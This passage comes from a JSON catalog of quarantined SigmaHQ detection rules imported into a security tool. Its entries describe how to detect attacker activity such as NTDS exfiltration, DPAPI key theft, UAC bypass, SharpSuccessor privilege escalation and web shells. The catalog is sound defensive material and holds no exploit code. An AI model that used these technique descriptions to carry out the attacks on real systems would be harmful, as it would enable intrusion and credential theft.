Scanning Feature Disabled", "description": "Detects if the secret scanning feature is disabled for an enterprise or repository.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1685" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/github-secret-scanning-feature-disabled.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "3883d9a0-fd0f-440f-afbb-445a2a799bb8", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/application/github/audit/github_secret_scanning_feature_disabled.yml" } }, { "id": "sigmahq-sigma-38879043-7e1e-47a9-8d46-6bec88e201df", "type": "detection", "name": "Potential Persistence Attempt Via Existing Service Tampering", "description": "Detects the modification of an existing service in order to execute an arbitrary payload when the service is started or killed as a potential method for persistence.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1543.003", "T1574.011" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-persistence-attempt-via-existing-service-tampering.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "38879043-7e1e-47a9-8d46-6bec88e201df", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": 
"https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_sc_service_tamper_for_persistence.yml" } }, { "id": "sigmahq-sigma-38a1ac5f-9c74-47d2-a345-dd6f5eb4e7c8", "type": "detection", "name": "HKTL - SharpSuccessor Privilege Escalation Tool Execution", "description": "Detects the execution of SharpSuccessor, a tool used to exploit the BadSuccessor attack for privilege escalation in WinServer 2025 Active Directory environments.\nSuccessful usage of this tool can let the attackers gain the domain admin privileges by exploiting the BadSuccessor vulnerability.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1068" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/hktl-sharpsuccessor-privilege-escalation-tool-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "38a1ac5f-9c74-47d2-a345-dd6f5eb4e7c8", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_hktl_sharpsuccessor_execution.yml" } }, { "id": "sigmahq-sigma-38a7625e-b2cb-485d-b83d-aff137d859f4", "type": "detection", "name": "Potential RemoteFXvGPUDisablement.EXE Abuse - PowerShell Module", "description": "Detects PowerShell module creation where the module Contents are set to \"function Get-VMRemoteFXPhysicalVideoAdapter\". 
This could be a sign of potential abuse of the \"RemoteFXvGPUDisablement.exe\" binary, which is known to be vulnerable to module load-order hijacking.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1218" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-remotefxvgpudisablement-exe-abuse-powershell-module.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "38a7625e-b2cb-485d-b83d-aff137d859f4", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_module/posh_pm_remotefxvgpudisablement_abuse.yml" } }, { "id": "sigmahq-sigma-38e7f511-3f74-41d4-836e-f57dfa18eead", "type": "detection", "name": "Potential Malicious Usage of CloudTrail System Manager", "description": "Detects when System Manager successfully executes commands against an instance.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1566", "T1566.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-malicious-usage-of-cloudtrail-system-manager.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "38e7f511-3f74-41d4-836e-f57dfa18eead", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", 
"upstream_path": "rules/cloud/aws/cloudtrail/aws_cloudtrail_ssm_malicious_usage.yml" } }, { "id": "sigmahq-sigma-38eb1dbb-011f-40b1-a126-cf03a0210563", "type": "detection", "name": "ESXi Syslog Configuration Change Via ESXCLI", "description": "Detects changes to the ESXi syslog configuration via \"esxcli\"", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1685", "T1690", "T1059.012" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/esxi-syslog-configuration-change-via-esxcli.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "38eb1dbb-011f-40b1-a126-cf03a0210563", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/process_creation/proc_creation_lnx_esxcli_syslog_config_change.yml" } }, { "id": "sigmahq-sigma-39019a4e-317f-4ce3-ae63-309a8c6b53c5", "type": "detection", "name": "Suspicious Scheduled Task Creation Involving Temp Folder", "description": "Detects the creation of scheduled tasks that involves a temporary folder and runs only once", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1053.005" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-scheduled-task-creation-involving-temp-folder.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": 
"39019a4e-317f-4ce3-ae63-309a8c6b53c5", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_schtasks_creation_temp_folder.yml" } }, { "id": "sigmahq-sigma-3908d64a-3c06-4091-b503-b3a94424533b", "type": "detection", "name": "New Github Organization Member Added", "description": "Detects when a new member is added or invited to a github organization.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1136.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/new-github-organization-member-added.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "3908d64a-3c06-4091-b503-b3a94424533b", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/application/github/audit/github_new_org_member.yml" } }, { "id": "sigmahq-sigma-3940b5f1-3f46-44aa-b746-ebe615b879e0", "type": "detection", "name": "AWS Route 53 Domain Transfer Lock Disabled", "description": "Detects when a transfer lock was removed from a Route 53 domain. 
It is recommended to refrain from performing this action unless intending to transfer the domain to a different registrar.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1098" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/aws-route-53-domain-transfer-lock-disabled.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "3940b5f1-3f46-44aa-b746-ebe615b879e0", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/aws/cloudtrail/aws_route_53_domain_transferred_lock_disabled.yml" } }, { "id": "sigmahq-sigma-395907ee-96e5-4666-af2e-2ca91688e151", "type": "detection", "name": "Wab Execution From Non Default Location", "description": "Detects execution of wab.exe (Windows Contacts) and Wabmig.exe (Microsoft Address Book Import Tool) from non default locations as seen with bumblebee activity", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/wab-execution-from-non-default-location.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "395907ee-96e5-4666-af2e-2ca91688e151", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": 
"rules/windows/process_creation/proc_creation_win_wab_execution_from_non_default_location.yml" } }, { "id": "sigmahq-sigma-39698b3f-da92-4bc6-bfb5-645a98386e45", "type": "detection", "name": "Win Susp Computer Name Containing Samtheadmin", "description": "Detects suspicious computer name samtheadmin-{1..100}$ generated by hacktool", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "critical", "category": "_quarantine", "mitre_techniques": [ "T1078" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/win-susp-computer-name-containing-samtheadmin.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "39698b3f-da92-4bc6-bfb5-645a98386e45", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/security/win_security_susp_computer_name.yml" } }, { "id": "sigmahq-sigma-396ae3eb-4174-4b9b-880e-dc0364d78a19", "type": "detection", "name": "Potential Persistence Via Outlook LoadMacroProviderOnBoot Setting", "description": "Detects the modification of Outlook setting \"LoadMacroProviderOnBoot\" which if enabled allows the automatic loading of any configured VBA project/module", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1137", "T1008", "T1546" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-persistence-via-outlook-loadmacroprovideronboot-setting.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine 
yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "396ae3eb-4174-4b9b-880e-dc0364d78a19", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_office_outlook_enable_load_macro_provider_on_boot.yml" } }, { "id": "sigmahq-sigma-396f6630-f3ac-44e3-bfc8-1b161bc00c4e", "type": "detection", "name": "Suspicious Child Process Of Wermgr.EXE", "description": "Detects suspicious Windows Error Reporting manager (wermgr.exe) child process", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1055", "T1036" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-child-process-of-wermgr-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "396f6630-f3ac-44e3-bfc8-1b161bc00c4e", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_wermgr_susp_child_process.yml" } }, { "id": "sigmahq-sigma-39a80702-d7ca-4a83-b776-525b1f86a36d", "type": "detection", "name": "Potential Secure Deletion with SDelete", "description": "Detects files that have extensions commonly seen while SDelete is used to wipe files.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1070.004", "T1027.005", "T1485", "T1553.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": 
"detections/sigma-imports/_quarantine/potential-secure-deletion-with-sdelete.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "39a80702-d7ca-4a83-b776-525b1f86a36d", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/security/win_security_sdelete_potential_secure_deletion.yml" } }, { "id": "sigmahq-sigma-39a94fd1-8c9a-4ff6-bf22-c058762f8014", "type": "detection", "name": "DPAPI Domain Master Key Backup Attempt", "description": "Detects anyone attempting a backup for the DPAPI Master Key. This events gets generated at the source and not the Domain Controller.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1003.004" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/dpapi-domain-master-key-backup-attempt.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "39a94fd1-8c9a-4ff6-bf22-c058762f8014", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/security/win_security_dpapi_domain_masterkey_backup_attempt.yml" } }, { "id": "sigmahq-sigma-39b31e81-5f5f-4898-9c0e-2160cfc0f9bf", "type": "detection", "name": "HackTool - Hashcat Password Cracker Execution", "description": "Execute Hashcat.exe with provided SAM file from registry of Windows and Password list to crack against", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], 
"severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1110.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/hacktool-hashcat-password-cracker-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "39b31e81-5f5f-4898-9c0e-2160cfc0f9bf", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_hktl_hashcat.yml" } }, { "id": "sigmahq-sigma-39b64854-5497-4b57-a448-40977b8c9679", "type": "detection", "name": "Malicious Driver Load By Name", "description": "Detects loading of known malicious drivers via the file name of the drivers.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1543.003", "T1068" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/malicious-driver-load-by-name.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "39b64854-5497-4b57-a448-40977b8c9679", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/driver_load/driver_load_win_mal_drivers_names.yml" } }, { "id": "sigmahq-sigma-39c9f26d-6e3b-4dbb-9c7a-4154b0281112", "type": "detection", "name": "AWS Bucket Deleted", "description": "Detects the deletion of S3 buckets in AWS CloudTrail logs.\nMonitoring the deletion of S3 buckets is 
critical for security and data integrity, as it may indicate potential data loss or unauthorized access attempts.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/aws-bucket-deleted.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "39c9f26d-6e3b-4dbb-9c7a-4154b0281112", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/aws/cloudtrail/aws_cloudtrail_bucket_deleted.yml" } }, { "id": "sigmahq-sigma-39ed3c80-e6a1-431b-9df3-911ac53d08a7", "type": "detection", "name": "UAC Bypass Using NTFS Reparse Point - Process", "description": "Detects the pattern of UAC Bypass using NTFS reparse point and wusa.exe DLL hijacking (UACMe 36)", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1548.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/uac-bypass-using-ntfs-reparse-point-process.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "39ed3c80-e6a1-431b-9df3-911ac53d08a7", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_uac_bypass_ntfs_reparse_point.yml" } }, { "id": 
"sigmahq-sigma-39f1f9f2-9636-45de-98f6-a4046aa8e4b9", "type": "detection", "name": "Potential Webshell Creation On Static Website", "description": "Detects the creation of files with certain extensions on a static web site. This can be indicative of potential uploads of a web shell.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1505.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-webshell-creation-on-static-website.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "39f1f9f2-9636-45de-98f6-a4046aa8e4b9", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/file/file_event/file_event_win_webshell_creation_detect.yml" } }, { "id": "sigmahq-sigma-39f919f3-980b-4e6f-a975-8af7e507ef2b", "type": "detection", "name": "Critical Hive In Suspicious Location Access Bits Cleared", "description": "Detects events from the Kernel-General ETW indicating that the access bits of a hive with a system like hive name located in the temp directory have been reset.\nThis occurs when an application tries to access a hive and the hive has not be recognized since the last 7 days (by default).\nRegistry hive dumping utilities such as QuarksPwDump were seen emitting this behavior.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1003.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": 
"detections/sigma-imports/_quarantine/critical-hive-in-suspicious-location-access-bits-cleared.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "39f919f3-980b-4e6f-a975-8af7e507ef2b", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/system/microsoft_windows_kernel_general/win_system_susp_critical_hive_location_access_bits_cleared.yml" } }, { "id": "sigmahq-sigma-3a6586ad-127a-4d3b-a677-1e6eacdf8fde", "type": "detection", "name": "Windows Shell/Scripting Processes Spawning Suspicious Programs", "description": "Detects suspicious child processes of a Windows shell and scripting processes such as wscript, rundll32, powershell, mshta...etc.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1059.005", "T1059.001", "T1218" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/windows-shell-scripting-processes-spawning-suspicious-programs.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "3a6586ad-127a-4d3b-a677-1e6eacdf8fde", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_susp_shell_spawn_susp_program.yml" } }, { "id": "sigmahq-sigma-3a716279-c18c-4488-83be-f9ececbfb9fc", "type": "detection", "name": "Linux Setgid Capability Set on a Binary via Setcap Utility", "description": "Detects the use of the 'setcap' utility to set 
the 'setgid' capability (cap_setgid) on a binary file.\nThis capability allows a non privileged process to make arbitrary manipulations of group IDs (GIDs), including setting its current GID to a value that would otherwise be restricted (i.e. GID 0, the root group).\nThis behavior can be used by adversaries to backdoor a binary in order to escalate privileges again in the future if needed.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1548", "T1554" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/linux-setgid-capability-set-on-a-binary-via-setcap-utility.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "3a716279-c18c-4488-83be-f9ececbfb9fc", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/process_creation/proc_creation_lnx_cap_setgid.yml" } }, { "id": "sigmahq-sigma-3a734d25-df5c-4b99-8034-af1ddb5883a4", "type": "detection", "name": "Suspicious Scheduled Task Creation", "description": "Detects suspicious scheduled task creation events. 
Based on attributes such as paths, command-line flags, etc.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1053.005" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-scheduled-task-creation.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "3a734d25-df5c-4b99-8034-af1ddb5883a4", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/security/win_security_susp_scheduled_task_creation.yml" } }, { "id": "sigmahq-sigma-3a8da4e0-36c1-40d2-8b29-b3e890d5172a", "type": "detection", "name": "NTDS Exfiltration Filename Patterns", "description": "Detects creation of files with specific name patterns used by various tools that export the NTDS.DIT for exfiltration.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1003.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/ntds-exfiltration-filename-patterns.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "3a8da4e0-36c1-40d2-8b29-b3e890d5172a", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/file/file_event/file_event_win_ntds_exfil_tools.yml" } }, { "id": 
"sigmahq-sigma-3a9b8c1e-5b2e-4f7a-9d1c-2a7f3b6e1c55", "type": "detection", "name": "RunMRU Registry Key Deletion - Registry", "description": "Detects attempts to delete the RunMRU registry key, which stores the history of commands executed via the run dialog.\nIn the clickfix techniques, the phishing lures instruct users to open a run dialog through (Win + R) and execute malicious commands.\nAdversaries may delete this key to cover their tracks after executing commands.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1070.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/runmru-registry-key-deletion-registry.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "3a9b8c1e-5b2e-4f7a-9d1c-2a7f3b6e1c55", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_delete/registry_delete_runmru.yml" } }, { "id": "sigmahq-sigma-3a9fa2ec-30bc-4ebd-b49e-7c9cff225502", "type": "detection", "name": "VsCode Powershell Profile Modification", "description": "Detects the creation or modification of a vscode related powershell profile which could indicate suspicious activity as the profile can be used as a mean of persistence", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1546.013" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/vscode-powershell-profile-modification.yaml", "quarantine_reason": 
"imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "3a9fa2ec-30bc-4ebd-b49e-7c9cff225502", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/file/file_event/file_event_win_susp_vscode_powershell_profile.yml" } }, { "id": "sigmahq-sigma-3ab65069-d82a-4d44-a759-466661a082d1", "type": "detection", "name": "Communication To LocaltoNet Tunneling Service Initiated", "description": "Detects an executable initiating a network connection to \"LocaltoNet\" tunneling sub-domains.\nLocaltoNet is a reverse proxy that enables localhost services to be exposed to the Internet.\nAttackers have been seen to use this service for command-and-control activities to bypass MFA and perimeter controls.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1572", "T1090", "T1102" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/communication-to-localtonet-tunneling-service-initiated.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "3ab65069-d82a-4d44-a759-466661a082d1", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/network_connection/net_connection_win_domain_localtonet_tunnel.yml" } }, { "id": "sigmahq-sigma-3ab79e90-9fab-4cdf-a7b2-6522bc742adb", "type": "detection", "name": "HackTool - RemoteKrbRelay SMB Relay Secrets Dump Module Indicators", "description": "Detects the creation of file with specific names used 
by RemoteKrbRelay SMB Relay attack module.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1219.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/hacktool-remotekrbrelay-smb-relay-secrets-dump-module-indicators.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "3ab79e90-9fab-4cdf-a7b2-6522bc742adb", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/file/file_event/file_event_win_hktl_krbrelay_remote_ioc.yml" } }, { "id": "sigmahq-sigma-3abd6094-7027-475f-9630-8ab9be7b9725", "type": "detection", "name": "Windows Admin Share Mount Via Net.EXE", "description": "Detects when an admin share is mounted using net.exe", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1021.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/windows-admin-share-mount-via-net-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", 